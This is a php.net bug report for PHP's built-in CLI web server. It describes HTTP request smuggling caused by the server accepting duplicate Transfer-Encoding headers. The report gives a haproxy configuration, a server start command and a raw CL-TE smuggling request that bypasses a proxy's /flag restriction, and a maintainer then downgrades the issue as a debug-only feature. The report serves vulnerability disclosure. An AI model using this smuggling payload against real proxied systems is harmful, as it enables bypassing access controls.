php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2020-09-01 07:12 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
Description:
------------
functions php_http_parser_execute in sapi\cli\php_http_parser.c parse http request. when I send to two Transfer-Encoding header, one true one false, in one http request, it will thouth that is a legal request. a attacker may use this feature make a HTTP Request Smuggling attack.

for example, using haproxy to make CL-TE attack:

haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag URI

```
global
 daemon
 maxconn 256

defaults
 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 127.0.0.1:8080 maxconn 32

```
run php webserver

```
php -S 127.0.0.1:8080
```

use this http request can bypass haproxy /flag restrict

```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1


```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2020-09-01 07:12 UTC] stas@php.net
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC] stas@php.net
PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Mon Nov 23 17:01:23 2020 UTC